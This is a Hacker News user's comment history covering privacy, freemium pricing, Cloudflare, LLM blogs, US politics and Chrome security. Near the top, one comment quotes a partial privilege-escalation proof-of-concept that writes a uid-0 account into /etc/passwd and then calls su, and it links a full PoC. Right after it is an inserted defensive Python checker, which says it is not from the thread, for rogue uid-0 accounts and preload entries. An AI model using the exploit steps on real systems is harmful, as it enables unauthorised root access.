Hacker News: hashstring's comments

Eh, if you can pollute page caches this won’t save you.

Think modifying shared libraries, ld preload, cron, I guess on some systems /etc/passwd even.

There are a lot of files readable that should definitely not be writable.


Fair enough -- a simpler change might be to poison /etc/passwd and call `su` to a user that has uid 0, since that requires no shell code nor a readable binary, and this seems to have worked in a slightly modified POC:

  f=g.open("/etc/passwd",0);
  e="rkeene:x:0:0:System administrator:/root:/run/current-system/sw/bin/bash\n".encode()
  ...
  g.system("/run/wrappers/bin/su - rkeene")

There is a PoC that does exactly that here: https://github.com/tgies/copy-fail-c
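A defender-side integrity check for the two persistence paths named in this thread (an extra uid-0 account in /etc/passwd and a populated /etc/ld.so.preload), written here as an added example; it is not code from the thread or from the linked PoC, and the passwd content it ships with is constructed.

```python
"""Flag the artefacts a page-cache write to /etc/passwd or /etc/ld.so.preload
would leave behind: a non-root uid-0 account, or any preloaded library."""
from pathlib import Path

# Constructed sample passwd file with one injected uid-0 account (same line
# shape as the PoC above; the account name is made up for this example).
SAMPLE_PASSWD = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"
    "alice:x:1000:1000:Alice:/home/alice:/bin/bash\n"
    "svcadm:x:0:0:System administrator:/root:/bin/bash\n"
)

def rogue_uid0_accounts(passwd_text, allowed=frozenset({"root"})):
    """Return findings for uid-0 entries outside the allow-list.
    Malformed lines are reported too: a tampered file may contain them."""
    findings = []
    for lineno, line in enumerate(passwd_text.splitlines(), 1):
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append(f"line {lineno}: malformed ({len(fields)} fields)")
            continue
        name, _pw, uid, *_ = fields
        if uid == "0" and name not in allowed:
            findings.append(f"line {lineno}: uid 0 account '{name}'")
    return findings

def preload_entries(preload_text):
    """/etc/ld.so.preload is normally absent or empty; every path listed in it
    is mapped into each dynamically linked process, including setuid ones."""
    return [l.strip() for l in preload_text.splitlines()
            if l.strip() and not l.lstrip().startswith("#")]

def audit(passwd_path="/etc/passwd", preload_path="/etc/ld.so.preload"):
    """Run both checks against the live system (Linux default paths)."""
    passwd = Path(passwd_path).read_text()
    p = Path(preload_path)
    preload = p.read_text() if p.exists() else ""
    return {"rogue_uid0": rogue_uid0_accounts(passwd),
            "preload": preload_entries(preload)}

if __name__ == "__main__":
    print(rogue_uid0_accounts(SAMPLE_PASSWD))  # the constructed sample
    print(audit())                              # the host this runs on
```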

Well said.


Amsterdam Airport? Source?


Well, I don’t have a source. It’s very hush hush, as even the part that the police are using it has been leaked by a redacted document. It’s crazy.

https://www.privacynieuws.nl/binnenlands-nieuws/politie-en-j...


Hm, ok, but you suspect that Amsterdam Airport (Schiphol Group I suppose) is using it?


If there’s something that screams late-stage capitalism any louder, I don’t want it…


What if they can’t protect your privacy, if they do not create a successful and sustainable business?


Why does STUN impact your QoS? I thought STUN was just for discovering your own external IP/port.


Makes me wonder.

Say 5% of the free tier users convert to a paying customer within 5 years. And user growth is constant. Then over time, you will get a much larger free tier user base, compared to your paying customers (in absolute numbers). At some point, it must become tempting to charge all free tier users a little bit to continue, because the group got so big, so there is a lot that can be earned there.

Is this wrong, or should we expect this?


Cloudflare still operates like this.


And they have become quite infamous for having aggressive sales tactics for anyone going over their internal metrics for the free tier (still under the public metrics for free).


If you’re going above those limits… come on lol.


Agree but also getting tired from all these blogs that state more or less the same thing about LLMs. I’ve read this before.


I could stand to hear less from both the enthusiasts and the detractors. My HN experience has changed substantially in the last couple of years.


I, and I believe many others, do hold him responsible for it.

However, I do not think starting there is a good idea: your progress in other areas would stall until that crook has been dealt with.


Like I’ve said a few times on HN, if you have 10 friends and ask them what they want to eat for dinner and 6 say “let’s go to a Mexican restaurant” and the other four say “let’s kill Bob and eat him”, it still tells you a lot about your friend group. It tells you even more if the person advocating eating Bob is made the leader of your group and decides where you are going to eat dinner for the next four years.

Especially after you have already seen what your friend has already done for four years.


Ok, but how does that relate to what I stated exactly?


Because it doesn’t matter if you or even 60% of the population doesn’t approve of what Trump is doing - including posting a racist meme showing the Obamas as apes yesterday - this tells you about the country we live in.


I fully agree that Chrome is spyware.

However, they do contribute to security: Chrome was first to implement Site Isolation, sandboxing too. These are essential security features for modern browsers. They are also not doing too bad with patching and security testing.

